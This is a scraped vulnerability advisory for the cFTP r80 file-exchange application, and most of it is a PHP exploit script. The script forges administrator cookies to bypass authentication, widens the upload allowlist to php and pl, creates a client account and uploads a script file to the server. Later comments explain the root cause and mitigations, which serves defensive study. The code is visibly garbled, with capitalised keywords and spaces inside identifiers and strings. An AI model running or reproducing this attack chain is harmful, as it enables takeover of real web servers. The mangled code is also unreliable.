Release date:
Updated on:
Affected Systems:
CFTP clients-oriented-ftp r80
Description:
--------------------------------------------------------------------------------
Bugtraq id: 48931
CFTP is a PHP-based file exchange application.
CFTP has an authentication bypass vulnerability in its cookie-based authentication. A remote attacker can exploit it to obtain administrator privileges on the affected application.
Source: Simon Leblanc
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures may be offensive and are intended only for security research and teaching. Use them at your own risk.
<? Php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: levivity (vulnerability discovered by Simon Leblanc)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux
#
# NOTE(review): this listing is a mangled transcript of the published script
# (capitalised keywords, spaces inside identifiers and string literals). It is
# kept as published and only annotated; read it as a description of the attack
# chain a defender has to break, not as runnable code.
// Vulnerable URL
$ Url = 'HTTP: // [url domain]/cFTP /';
// The file to upload
$ Filename = dirname (_ FILE _). '/info. php ';
// Script extensions the chain later appends to the application's list of
// allowed upload types; the server-side upload allowlist is the second control
// that fails in this chain.
$ Failext = array ('php', 'pl ');
$ Username = 'hackname'. rand (0, 999999 );
// Root cause (per the advisory): the application honours access-level values
// supplied in the client's Cookie header, so a request carrying this header is
// treated as an administrator without ever authenticating. Authorisation must
// come from server-side session state, never from client-controlled cookies.
$ Cookies_injection = 'Access = admin; userlevel = 9'; // <-- the big error of this app :-)
/**
* Call URL
*
* Issue one HTTP POST to $url through cURL, sending the supplied raw Cookie
* header value and, when $inputs is an array, the given form fields.
* Response headers are excluded from the body (CURLOPT_HEADER false), the body
* is returned as a string (CURLOPT_RETURNTRANSFER) and redirects are followed
* automatically (CURLOPT_FOLLOWLOCATION).
*
* @param string     $url               absolute URL to request
* @param string     $cookies_injection raw Cookie header value, sent as-is
* @param array|null $inputs            POST fields; only attached when it is an array
* @return array     [response body, curl_getinfo() array, curl errno, curl error string]
*
* Detection note: every step of the chain is a POST carrying a Cookie header
* with admin access/userlevel values for a client that never logged in.
*/
Function curl_call_url ($ url, $ cookies_injection, $ inputs = null)
{
$ Curl = curl_init ();
Curl_setopt ($ curl, CURLOPT_URL, $ url );
Curl_setopt ($ curl, CURLOPT_HEADER, false );
Curl_setopt ($ curl, CURLOPT_POST, true );
Curl_setopt ($ curl, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ curl, CURLOPT_FOLLOWLOCATION, true );
// The forged cookie string is passed straight through to the request.
Curl_setopt ($ curl, CURLOPT_COOKIE, $ cookies_injection );
If (is_array ($ inputs) === true ){
Curl_setopt ($ curl, CURLOPT_POSTFIELDS, $ inputs );
}
$ Response = curl_exec ($ curl );
$ Headers = curl_getinfo ($ curl );
$ Error_number = curl_errno ($ curl );
$ Error_message = curl_error ($ curl );
Curl_close ($ curl );
Return array ($ response, $ headers, $ error_number, $ error_message );
}
// NOTE(review): mangled transcript kept as published; annotated only.
//
// Step 1: fetch the admin Options form with nothing but the forged cookie.
// An unauthenticated client should be refused here; that it is not is the
// authentication bypass the advisory describes.
// Add vulnerable extensions (php, pl: defined in $ failext)
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'Options. php', $ cookies_injection );
// Scrape every named input and its current value so the whole form can be
// replayed with one field changed.
If (preg_match_all ('/<input ([^>] +) name = "([^"] +) "([^>] +) value = "([^"] +) ([^>] *)>/', $ response, $ matches )){
$ Input = array ();
$ Count = count ($ matches [0]);
For ($ I = 0; $ I <$ count; $ I ++ ){
$ Input [$ matches [2] [$ I] = $ matches [4] [$ I];
// Step 2: extend allowed_file_types with the script extensions in $failext.
// The upload allowlist is an admin-editable setting, so a forged admin
// session can simply widen it. Mitigation: enforce a server-side allowlist
// (and content checks) that the settings page cannot override, and never
// serve uploaded files from a script-executing location.
If ($ matches [2] [$ I] === 'allowed _ file_types '){
Foreach ($ failext as $ ext ){
If (strpos ($ matches [4] [$ I], $ ext) === false ){
$ Input [$ matches [2] [$ I]. = ','. $ ext;
}
}
// Entries were joined with ','; every ',' is then turned into '|', the
// separator the form apparently expects.
$ Input [$ matches [2] [$ I] = str_replace (',', '|', $ input [$ matches [2] [$ I]);
}
}
// Add select
// Replay the currently selected timezone so the form validates; fall back to
// a fixed zone when no option is marked selected.
If (preg_match ('/<option selected = "selected" value = "([^"] +) "/', $ response, $ matches )){
$ Input ['timezone '] = $ matches [1];
} Else {
$ Input ['timezone '] = 'America/Argentina/Buenos_Aires ';
}
// Validate the form to add the vulnerables extensions
// Step 3: submit the modified Options form; success is detected by the
// response containing the 'message_OK' marker. A change to the allowed
// upload types from a session with no login is the first log artefact of
// this chain.
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'Options. php', $ cookies_injection, $ input );
If (strpos ($ response, 'message _ OK ')! = False ){
// Add new client: required to upload the file
// Step 4: create a client account through the admin-only client form; the
// upload form needs an existing client name. The new client record is the
// second log artefact.
$ Input = array (
'Add _ client_form_name '=> $ username,
'Add _ client_form_user '=> $ username,
'Add _ client_form_pass '=> 'hackname ',
'Add _ client_form_pass2 '=> 'hackname ',
'Add _ client_form_address '=> 'my address ',
'Add _ client_form_phone '=> '000-000-000 ',
// 'Add _ client_form_policy '=> '0 ',
'Add _ client_form_email '=> $ username.' @ example.com ',
'Add _ client_form_intcont '=> '',
'Submit '=> 'create account ',
);
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'clientform. php', $ cookies_injection, $ input );
If (strpos ($ response, 'message _ OK ')! = False ){
// Now upload file :-)
// Step 5: upload the local script file as that client. The '@' prefix is
// cURL's syntax for attaching a file to a POST field.
$ Input = array (
'Name' => 'my _ hack_file ',
'Description' => 'it \'s my hack file ',
'Clientname' => $ username,
'Ufile' => '@'. $ filename,
'Submit '=> 'upload ',
);
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'fileupload. php', $ cookies_injection, $ input );
If (preg_match ('# <a href = "([^"] +) "> File uploaded correctly #', $ response, $ matches )){
// Get filename
// Step 6: follow the link in the success message and locate the stored
// file. The URL printed below is the web-reachable path of the uploaded
// script, which is why uploads must not live under a document root that
// executes scripts.
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. $ matches [1], $ cookies_injection );
If (preg_match ('# <a href = "([^"] + )'. basename ($ filename ). '"target =" _ blank "#', $ response, $ matches_end )){
Echo 'Your file is here: '. $ url. $ matches [1]. $ matches_end [1]. basename ($ filename );
} Else {
Var_dump ($ response );
Echo 'fail to hack: where is the file !!! ';
}
} Else {
Var_dump ($ response );
Echo 'fail to hack: file not uploaded ';
}
} Else {
Var_dump ($ response );
Echo 'fail to hack: client not created ';
}
} Else {
Var_dump ($ response );
Echo 'fail to hack: options not changed ';
}
} Else {
// The Options form could not be scraped; nothing in the chain ran.
Var_dump ($ response );
Echo 'fail to hack: no input ';
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
CFTP
----
At the time of writing, the vendor has not released a patch or upgrade. Users of this software should monitor the vendor's homepage for the latest version:
https://code.google.com/p/clients-oriented-ftp/downloads/list